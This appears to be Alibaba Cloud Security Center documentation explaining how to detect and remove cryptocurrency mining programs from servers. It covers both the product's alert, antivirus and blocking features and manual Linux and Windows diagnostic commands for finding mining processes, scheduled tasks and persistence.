This topic describes the features that are provided by Security Center to handle mining programs. The features include security alerting, virus detection, virus blocking, attack source tracing, and attack analysis.
Prerequisites
The Security Center agent that is installed on your server is in the enabled state. You can view the status of the agent on the Server(s) tab of the Assets page. Security Center protects the server only when the Security Center agent is enabled.
If the Security Center agent is in the Disable Protection state, the agent is disabled. In this case, Security Center cannot protect the server. You must enable the Security Center agent for the server. For more information, see Enable or disable server protection.
If the Security Center agent is in the Offline state, the Security Center agent is not installed on the server. In this case, Security Center cannot protect the server. You must install the Security Center agent on the server. For more information, see Install the Security Center agent.
If you have installed the Security Center agent on the server and the Security Center agent is in the Offline state, you must troubleshoot why the Security Center agent is in the Offline state. For more information, see Troubleshoot why the Security Center agent is offline.
Limits
You can handle mining programs that are detected on your server only if you use the Anti-virus, Advanced, Enterprise, or Ultimate edition of Security Center. Security Center Basic supports only threat detection and security alerting. You cannot use Security Center Basic to handle alerts. If you use Security Center Basic, you must purchase the Anti-virus, Advanced, or Enterprise edition before you can handle alerts. For more information, see Purchase Security Center.
Free trial
Security Center provides a 7-day free trial of the Ultimate edition for users of the Basic edition.
If you have not purchased Security Center, you can apply for a free trial of the Ultimate edition to handle mining programs. For more information about how to apply for a free trial of the Ultimate edition, see Apply for a 7-day free trial of Security Center.
Characteristics of mining programs
Mining programs can overclock the CPU, which consumes a large number of CPU resources and affects other applications that run on your server.
The characteristics of mining programs are similar to the characteristics of computer worms. After a mining program intrudes into your server, the mining program spreads to the servers that are deployed in the same internal network. After the servers are compromised, the mining program achieves persistence on the servers.
In most cases, mining programs spread to multiple system services and are difficult to remove from the system. Mining programs may repeatedly appear, and system commands may be replaced with malicious scripts. As a result, the system may run malicious scripts such as XOR DDoS. You must remove all trojans and persistent webshells from your server within the execution period of mining programs. This way, mining programs are prevented from appearing in the future.
Determine whether your assets contain mining programs
If the CPU utilization of your server significantly increases, for example, to 80% or higher, and an unknown process continues to transmit packets, a mining program is running on your server. For more information, see How do I check whether mining programs exist in my assets?
Use Security Center to handle mining programs
In the alert list of the Alerts page, find an alert that is generated for a mining program in the Event column, and click Process in the Actions column.
If a mining program is detected, Security Center generates an alert.
ImportantIf you find alerts in the console or receive notifications, we recommend that you use the antivirus feature to scan and remove hidden malicious files and persistent malicious files at the earliest opportunity. For more information, see Use the virus detection and removal feature.
In the dialog box that appears, perform the following steps to remove the mining program: Select Anti-Virus, select Isolate the source file of the process and End the process., and then click Process Now to prevent the mining program from restarting.
Security Center allows you to handle multiple alerts at a time. If you want to handle the alerts that are triggered by the same rule or rules of the same type at a time, select Batch unhandled.
To handle an alert that is related to mining, find the alert, click Process in the Actions column, and then select Block in the dialog box that appears. For example, the alert is generated for mining pool communications.
Security Center generates policies to prevent servers from communicating with the IP addresses of mining pools. This way, you have sufficient time to handle security events. You can add the IP addresses of mining pools to a security group to block the IP addresses.
View the alerts that are generated for suspicious processes, and check whether unusual scheduled tasks exist.
Enable the virus blocking feature.
If you fail to remove mining programs that are retained on your server and the mining programs repeatedly appear on your server, you can enable the virus blocking feature of Security Center to block mining programs and prevent these mining programs from running. For more information about how to enable the virus blocking feature, see Use proactive defense.
You can use the antivirus feature of Security Center to scan your server. The scan results are displayed on the Alerts page. The feature also removes the persistent items of malicious files. The persistent items include self-starting items and scheduled tasks. For more information, see Use the virus detection and removal feature.
NoteAfter the virus scan is complete, we recommend that you handle the alerts that are reported on the Alerts page at the earliest opportunity to ensure the security of your server.
You can also use the feature of attack source tracing that is provided by Security Center to trace the intrusion process and analyze how mining programs intrude into your server.
Use other methods to handle mining programs
Mining programs can insert a large number of persistent webshells into a victim server to obtain the most profits. In this case, viruses are difficult to remove or cannot be removed. If you have not purchased Security Center, you can perform the following steps to detect and handle mining programs.
Linux servers
Run the following command to query the executable file of the mining program.
ls -l /proc/xxx/exe // xxx indicates the process ID (PID) of the mining program.Remove the executable file of the mining program.
Identify the mining program among the processes that cause high CPU consumption and terminate the program.
Check whether the firewall of your server contains the address of the mining pool to which the mining program belongs and delete the address of the mining pool.
Run the following command to detect unusual communication addresses and open ports that are not required for normal workloads.
iptables -L -n
Run the following command to delete the address of the mining pool.
vi /etc/sysconfig/iptables
Run the following command to check whether scheduled tasks exist.
crontab -l
You can handle suspicious scheduled task files based on the check results. This prevents repeated intrusions.
Run the following command to check whether the SSH public key contains mining viruses. This prevents persistent webshells.
cat .ssh/authorized_keys
Check whether mining programs exist on other servers that are deployed on the same internal network. This way, you can protect the servers from mining programs at the earliest opportunity.
Windows servers
Run the following command in PowerShell to identify mining programs among the processes that cause high CPU consumption.
ps | sort -des cpu While(1) {ps | sort -des cpu | select -f 15 | ft -a; sleep 1; cls}Run the following command to query the executable file of the mining program and the parameters in the command that is used to start the mining program.
wmic process where processid=xxx get processid,executablepath,commandline,name //xxx indicates PID.Terminate the mining program and remove the executable file of the mining program.
Run the following command to detect suspicious ports of your server.
netstat -ano | findstr xxx // xxx indicates the suspicious port.Run the following command to check whether the hosts file in the server contains the address of the mining pool to which the mining program belongs.
type C:\Windows\System32\drivers\etc\hostsRun the following command to check whether the scheduled tasks specified by the mining program exist on your server.
schtasks /query
Other methods
If the underlying system components of your server are affected by viruses, you may fail to troubleshoot the issues or remove the viruses. We recommend that you back up your data and restore the operating system of your server. This ensures that the mining program is completely removed. To use this method, perform the following operations:
Create a snapshot to back up data on your server. For more information, see Create a snapshot for a disk.
Initialize the operating system of the server. For more information, see Re-initialize a system disk.
Create a disk from the snapshot. For more information, see Create a disk from a snapshot.
Attach the disk to the server after the operating system is reinstalled. For more information, see Attach a data disk.
Alibaba Cloud provides the Emergency Response service that is delivered by security experts. The following list describes the service content:
Remove trojans, viruses, suspicious accounts, suspicious files, webshells, and hidden links from the system in a comprehensive manner.
Analyze intrusion behavior and identify causes of intrusions.
Provide guidance on security hardening.